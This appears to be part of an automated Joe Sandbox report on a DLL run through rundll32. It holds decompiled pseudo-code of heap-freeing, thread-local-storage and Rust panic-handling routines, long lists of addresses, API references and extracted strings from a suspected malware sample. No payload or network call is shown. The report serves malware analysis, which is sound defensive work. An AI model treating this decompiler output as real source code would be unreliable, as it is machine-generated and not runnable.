                                                                                                                                                                                      													_t248 =  *(_t248 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t248);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t343);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t269 = _v128;
                                                                                                                                                                                      										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
                                                                                                                                                                                      										if(_t222 == 0) {
                                                                                                                                                                                      											__imp__AcquireSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											_v68 = 0x6ea1fad0;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v152 = 0x6ea2e10c;
                                                                                                                                                                                      											_v41 = _t269;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v20 = 6;
                                                                                                                                                                                      											_v124 =  &_v41;
                                                                                                                                                                                      											_v120 = E6E9DDD30;
                                                                                                                                                                                      											_v52 =  &_v124;
                                                                                                                                                                                      											_v48 = 1;
                                                                                                                                                                                      											_t225 = E6E9DD0F0( &_v92, __eflags);
                                                                                                                                                                                      											_t341 =  &_v68;
                                                                                                                                                                                      											__imp__ReleaseSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											__eflags = _t225 - 3;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v20 = 5;
                                                                                                                                                                                      											_v40 = _t341;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											goto L90;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t222 == 1) {
                                                                                                                                                                                      												L95:
                                                                                                                                                                                      												_t372 = _v36;
                                                                                                                                                                                      												if(_t372 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t372 == 0) {
                                                                                                                                                                                      														E6E9DC640(_v84);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t342 = _v140;
                                                                                                                                                                                      												_t338 = _v136;
                                                                                                                                                                                      												_t373 = _v72;
                                                                                                                                                                                      												if(_t373 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t373 == 0) {
                                                                                                                                                                                      														E6E9DDA70(_v72);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__imp__ReleaseSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      												_t374 = _v132 - 1;
                                                                                                                                                                                      												_v20 = 0xffffffff;
                                                                                                                                                                                      												if(_v132 > 1) {
                                                                                                                                                                                      													_v68 = 0x6ea2029c;
                                                                                                                                                                                      													_v64 = 1;
                                                                                                                                                                                      													_v60 = 0;
                                                                                                                                                                                      													_v52 = 0x6ea1f570;
                                                                                                                                                                                      													_v76 = 0;
                                                                                                                                                                                      													_v80 = 0;
                                                                                                                                                                                      													_v48 = 0;
                                                                                                                                                                                      													_t229 = E6E9DD0F0( &_v80, _t374);
                                                                                                                                                                                      													_v120 =  &_v68;
                                                                                                                                                                                      													_v124 = _t229;
                                                                                                                                                                                      													E6E9DD2B0( &_v124);
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t285 = _t338;
                                                                                                                                                                                      												E6E9DD290(_t285, _t342);
                                                                                                                                                                                      												asm("ud2");
                                                                                                                                                                                      												goto L104;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *0x6ea2d040 = 0;
                                                                                                                                                                                      											_t368 =  *0x6ea2d040;
                                                                                                                                                                                      											if( *0x6ea2d040 == 0) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t330 =  &_v68;
                                                                                                                                                                                      											_v68 = 0x6ea2017c;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v52 = 0x6ea1f570;
                                                                                                                                                                                      											_v48 = 0;
                                                                                                                                                                                      											_v20 = 3;
                                                                                                                                                                                      											if(E6E9DD0F0( &_v92, _t368) != 3) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v40 = _t330;
                                                                                                                                                                                      											_v20 = 4;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											L90:
                                                                                                                                                                                      											_t296 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t296 + 4)) != 0) {
                                                                                                                                                                                      												_t238 =  *_v40;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
                                                                                                                                                                                      													_t238 =  *(_t238 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t238);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _v40);
                                                                                                                                                                                      											goto L95;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t213 = 0;
                                                                                                                                                                                      									goto L105;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t213 = 0;
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}

































































































                                                                                                                                                                                      0x6e9dc6d7
                                                                                                                                                                                      0x6e9dc6da
                                                                                                                                                                                      0x6e9dc6de
                                                                                                                                                                                      0x6e9dc6e5
                                                                                                                                                                                      0x6e9dc6e6
                                                                                                                                                                                      0x6e9dc6e8
                                                                                                                                                                                      0x6e9dc6ed
                                                                                                                                                                                      0x6e9dc6f0
                                                                                                                                                                                      0x6e9dc6f2
                                                                                                                                                                                      0x6e9dc6f3
                                                                                                                                                                                      0x6e9dc6f4
                                                                                                                                                                                      0x6e9dc6f5
                                                                                                                                                                                      0x6e9dc6f6
                                                                                                                                                                                      0x6e9dc6f7
                                                                                                                                                                                      0x6e9dc6f8
                                                                                                                                                                                      0x6e9dc6f9
                                                                                                                                                                                      0x6e9dc6fa
                                                                                                                                                                                      0x6e9dc6fb
                                                                                                                                                                                      0x6e9dc6fc
                                                                                                                                                                                      0x6e9dc6fd
                                                                                                                                                                                      0x6e9dc6fe
                                                                                                                                                                                      0x6e9dc6ff
                                                                                                                                                                                      0x6e9dc706
                                                                                                                                                                                      0x6e9dc70c
                                                                                                                                                                                      0x6e9dc70f
                                                                                                                                                                                      0x6e9dc716
                                                                                                                                                                                      0x6e9dc71d
                                                                                                                                                                                      0x6e9dc722
                                                                                                                                                                                      0x6e9dc727
                                                                                                                                                                                      0x6e9dc730
                                                                                                                                                                                      0x6e9dc733
                                                                                                                                                                                      0x6e9dc739
                                                                                                                                                                                      0x6e9dc741
                                                                                                                                                                                      0x6e9dc746
                                                                                                                                                                                      0x6e9dc748
                                                                                                                                                                                      0x6e9dc762
                                                                                                                                                                                      0x6e9dc767
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76e
                                                                                                                                                                                      0x6e9dc771
                                                                                                                                                                                      0x6e9dc774
                                                                                                                                                                                      0x6e9dc776
                                                                                                                                                                                      0x6e9dc7ea
                                                                                                                                                                                      0x6e9dc7ed
                                                                                                                                                                                      0x6e9dc84a
                                                                                                                                                                                      0x6e9dc851
                                                                                                                                                                                      0x6e9dc85b
                                                                                                                                                                                      0x6e9dc862
                                                                                                                                                                                      0x6e9dc869
                                                                                                                                                                                      0x6e9dc86d
                                                                                                                                                                                      0x6e9dc874
                                                                                                                                                                                      0x6e9dc87b
                                                                                                                                                                                      0x6e9dc881
                                                                                                                                                                                      0x6e9dc884
                                                                                                                                                                                      0x6e9dc887
                                                                                                                                                                                      0x6e9dc88d
                                                                                                                                                                                      0x6e9dc894
                                                                                                                                                                                      0x6e9dc897
                                                                                                                                                                                      0x6e9dc89e
                                                                                                                                                                                      0x6e9dc8a3
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc8ac
                                                                                                                                                                                      0x6e9dc8b4
                                                                                                                                                                                      0x6e9dc8b7
                                                                                                                                                                                      0x6e9dc8b9
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bf
                                                                                                                                                                                      0x6e9dc8c2
                                                                                                                                                                                      0x6e9dc8c6
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc7f2
                                                                                                                                                                                      0x6e9dc7f5
                                                                                                                                                                                      0x6e9dc7fc
                                                                                                                                                                                      0x6e9dc803
                                                                                                                                                                                      0x6e9dc80a
                                                                                                                                                                                      0x6e9dc811
                                                                                                                                                                                      0x6e9dc815
                                                                                                                                                                                      0x6e9dc81c
                                                                                                                                                                                      0x6e9dc823
                                                                                                                                                                                      0x6e9dc828
                                                                                                                                                                                      0x6e9dc82a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc830
                                                                                                                                                                                      0x6e9dc835
                                                                                                                                                                                      0x6e9dc83d
                                                                                                                                                                                      0x6e9dc840
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc785
                                                                                                                                                                                      0x6e9dc78b
                                                                                                                                                                                      0x6e9dc795
                                                                                                                                                                                      0x6e9dc79c
                                                                                                                                                                                      0x6e9dc7a3
                                                                                                                                                                                      0x6e9dc7a9
                                                                                                                                                                                      0x6e9dc7ac
                                                                                                                                                                                      0x6e9dc7af
                                                                                                                                                                                      0x6e9dc7b2
                                                                                                                                                                                      0x6e9dc7b5
                                                                                                                                                                                      0x6e9dc7ba
                                                                                                                                                                                      0x6e9dc7bd
                                                                                                                                                                                      0x6e9dc7bf
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f6
                                                                                                                                                                                      0x6e9dc8f8
                                                                                                                                                                                      0x6e9dc9cb
                                                                                                                                                                                      0x6e9dc9d0
                                                                                                                                                                                      0x6e9dc9d3
                                                                                                                                                                                      0x6e9dc9d6
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x6e9dc9dc
                                                                                                                                                                                      0x6e9dc9df
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x6e9dc9e5
                                                                                                                                                                                      0x6e9dc9e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9f0
                                                                                                                                                                                      0x6e9dc9f5
                                                                                                                                                                                      0x6e9dc9f8
                                                                                                                                                                                      0x6e9dc9fb
                                                                                                                                                                                      0x6e9dc9fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x6e9dc8fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc7c5
                                                                                                                                                                                      0x6e9dc7dd
                                                                                                                                                                                      0x6e9dc7e2
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc05
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc936
                                                                                                                                                                                      0x6e9dc939
                                                                                                                                                                                      0x6e9dc940
                                                                                                                                                                                      0x6e9dc942
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc94d
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca38
                                                                                                                                                                                      0x6e9dca3a
                                                                                                                                                                                      0x6e9dca3c
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca47
                                                                                                                                                                                      0x6e9dca4d
                                                                                                                                                                                      0x6e9dca4f
                                                                                                                                                                                      0x6e9dcc0f
                                                                                                                                                                                      0x6e9dcc14
                                                                                                                                                                                      0x6e9dcc16
                                                                                                                                                                                      0x6e9dcc26
                                                                                                                                                                                      0x6e9dcc2b
                                                                                                                                                                                      0x6e9dcc30
                                                                                                                                                                                      0x6e9dcc32
                                                                                                                                                                                      0x6e9dcc72
                                                                                                                                                                                      0x6e9dcc78
                                                                                                                                                                                      0x6e9dcc7f
                                                                                                                                                                                      0x6e9dcc81
                                                                                                                                                                                      0x6e9dcc86
                                                                                                                                                                                      0x6e9dcc88
                                                                                                                                                                                      0x6e9dcc8f
                                                                                                                                                                                      0x6e9dcc92
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x6e9dcc34
                                                                                                                                                                                      0x6e9dcc3e
                                                                                                                                                                                      0x6e9dcc43
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc48
                                                                                                                                                                                      0x6e9dcc4b
                                                                                                                                                                                      0x6e9dcc4e
                                                                                                                                                                                      0x6e9dccf8
                                                                                                                                                                                      0x6e9dccfe
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd12
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd2d
                                                                                                                                                                                      0x6e9dcd35
                                                                                                                                                                                      0x6e9dcd38
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc907
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc910
                                                                                                                                                                                      0x6e9dc913
                                                                                                                                                                                      0x6e9dc915
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc925
                                                                                                                                                                                      0x6e9dca0d
                                                                                                                                                                                      0x6e9dca10
                                                                                                                                                                                      0x6e9dca1e
                                                                                                                                                                                      0x6e9dca20
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca26
                                                                                                                                                                                      0x6e9dca29
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x6e9dc92b
                                                                                                                                                                                      0x6e9dc92e
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x6e9dcd00
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x6e9dcc54
                                                                                                                                                                                      0x6e9dcc57
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc5d
                                                                                                                                                                                      0x6e9dcc60
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc66
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x6e9dcc18
                                                                                                                                                                                      0x6e9dcc1d
                                                                                                                                                                                      0x6e9dcc1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca57
                                                                                                                                                                                      0x6e9dca5a
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca5
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dccab
                                                                                                                                                                                      0x6e9dccb1
                                                                                                                                                                                      0x6e9dccb8
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dccc5
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x6e9dcccd
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dca60
                                                                                                                                                                                      0x6e9dca67
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dc95c
                                                                                                                                                                                      0x6e9dc95f
                                                                                                                                                                                      0x6e9dc961
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc967
                                                                                                                                                                                      0x6e9dc96a
                                                                                                                                                                                      0x6e9dc96d
                                                                                                                                                                                      0x6e9dcbf6
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x6e9dc973
                                                                                                                                                                                      0x6e9dc979
                                                                                                                                                                                      0x6e9dc97e
                                                                                                                                                                                      0x6e9dc980
                                                                                                                                                                                      0x6e9dc983
                                                                                                                                                                                      0x6e9dc98a
                                                                                                                                                                                      0x6e9dc98f
                                                                                                                                                                                      0x6e9dc992
                                                                                                                                                                                      0x6e9dc994
                                                                                                                                                                                      0x6e9dc997
                                                                                                                                                                                      0x6e9dc999
                                                                                                                                                                                      0x6e9dc99b
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a0
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9ab
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b8
                                                                                                                                                                                      0x6e9dc9bb
                                                                                                                                                                                      0x6e9dc9be
                                                                                                                                                                                      0x6e9dcce0
                                                                                                                                                                                      0x6e9dcce6
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcceb
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea7
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dca70
                                                                                                                                                                                      0x6e9dca77
                                                                                                                                                                                      0x6e9dca7e
                                                                                                                                                                                      0x6e9dca85
                                                                                                                                                                                      0x6e9dca8c
                                                                                                                                                                                      0x6e9dca90
                                                                                                                                                                                      0x6e9dca97
                                                                                                                                                                                      0x6e9dca9e
                                                                                                                                                                                      0x6e9dcaa5
                                                                                                                                                                                      0x6e9dcaad
                                                                                                                                                                                      0x6e9dcab0
                                                                                                                                                                                      0x6e9dcab6
                                                                                                                                                                                      0x6e9dcab9
                                                                                                                                                                                      0x6e9dcabf
                                                                                                                                                                                      0x6e9dcac5
                                                                                                                                                                                      0x6e9dcacc
                                                                                                                                                                                      0x6e9dcad5
                                                                                                                                                                                      0x6e9dcadc
                                                                                                                                                                                      0x6e9dcae2
                                                                                                                                                                                      0x6e9dcae9
                                                                                                                                                                                      0x6e9dcaec
                                                                                                                                                                                      0x6e9dcafa
                                                                                                                                                                                      0x6e9dcb01
                                                                                                                                                                                      0x6e9dcb09
                                                                                                                                                                                      0x6e9dcb0c
                                                                                                                                                                                      0x6e9dcb0e
                                                                                                                                                                                      0x6e9dcb11
                                                                                                                                                                                      0x6e9dcb14
                                                                                                                                                                                      0x6e9dcb1b
                                                                                                                                                                                      0x6e9dcb1d
                                                                                                                                                                                      0x6e9dcb23
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb44
                                                                                                                                                                                      0x6e9dcb55
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dcd4b
                                                                                                                                                                                      0x6e9dcd5a
                                                                                                                                                                                      0x6e9dcd61
                                                                                                                                                                                      0x6e9dcd68
                                                                                                                                                                                      0x6e9dcd72
                                                                                                                                                                                      0x6e9dcd75
                                                                                                                                                                                      0x6e9dcd7c
                                                                                                                                                                                      0x6e9dcd83
                                                                                                                                                                                      0x6e9dcd89
                                                                                                                                                                                      0x6e9dcd90
                                                                                                                                                                                      0x6e9dcd93
                                                                                                                                                                                      0x6e9dcd9a
                                                                                                                                                                                      0x6e9dcd9f
                                                                                                                                                                                      0x6e9dcda8
                                                                                                                                                                                      0x6e9dcdae
                                                                                                                                                                                      0x6e9dcdb1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdb8
                                                                                                                                                                                      0x6e9dcdc0
                                                                                                                                                                                      0x6e9dcdc3
                                                                                                                                                                                      0x6e9dcdc5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb60
                                                                                                                                                                                      0x6e9dcb63
                                                                                                                                                                                      0x6e9dce00
                                                                                                                                                                                      0x6e9dce03
                                                                                                                                                                                      0x6e9dce05
                                                                                                                                                                                      0x6e9dce07
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce17
                                                                                                                                                                                      0x6e9dce1d
                                                                                                                                                                                      0x6e9dce23
                                                                                                                                                                                      0x6e9dce25
                                                                                                                                                                                      0x6e9dce27
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce39
                                                                                                                                                                                      0x6e9dce3f
                                                                                                                                                                                      0x6e9dce43
                                                                                                                                                                                      0x6e9dce4a
                                                                                                                                                                                      0x6e9dce52
                                                                                                                                                                                      0x6e9dce59
                                                                                                                                                                                      0x6e9dce60
                                                                                                                                                                                      0x6e9dce67
                                                                                                                                                                                      0x6e9dce6e
                                                                                                                                                                                      0x6e9dce72
                                                                                                                                                                                      0x6e9dce79
                                                                                                                                                                                      0x6e9dce80
                                                                                                                                                                                      0x6e9dce88
                                                                                                                                                                                      0x6e9dce8b
                                                                                                                                                                                      0x6e9dce8e
                                                                                                                                                                                      0x6e9dce93
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce97
                                                                                                                                                                                      0x6e9dce9b
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x6e9dcb6b
                                                                                                                                                                                      0x6e9dcb71
                                                                                                                                                                                      0x6e9dcb73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb7c
                                                                                                                                                                                      0x6e9dcb7f
                                                                                                                                                                                      0x6e9dcb86
                                                                                                                                                                                      0x6e9dcb8d
                                                                                                                                                                                      0x6e9dcb94
                                                                                                                                                                                      0x6e9dcb9b
                                                                                                                                                                                      0x6e9dcba2
                                                                                                                                                                                      0x6e9dcbb0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbbb
                                                                                                                                                                                      0x6e9dcbbe
                                                                                                                                                                                      0x6e9dcbc6
                                                                                                                                                                                      0x6e9dcbc8
                                                                                                                                                                                      0x6e9dcdc8
                                                                                                                                                                                      0x6e9dcdcb
                                                                                                                                                                                      0x6e9dcdd2
                                                                                                                                                                                      0x6e9dcddb
                                                                                                                                                                                      0x6e9dcddd
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dc7bf

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9DC700: AcquireSRWLockShared.KERNEL32(6EA2E11C), ref: 6E9DC785
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DC8DC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DC8EA
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DC94D
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DCB31
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DCB3F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E9DCC00
                                                                                                                                                                                      • cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6E9DC74D, 6E9DC7C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeHeap$AcquireLockSharedValue
                                                                                                                                                                                      • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
                                                                                                                                                                                      • API String ID: 942675266-716947571
                                                                                                                                                                                      • Opcode ID: 7bda7ee4f025edb1cb2fae988b1c64033e79d8c7b012b34688b3d6bd02c0f3a4
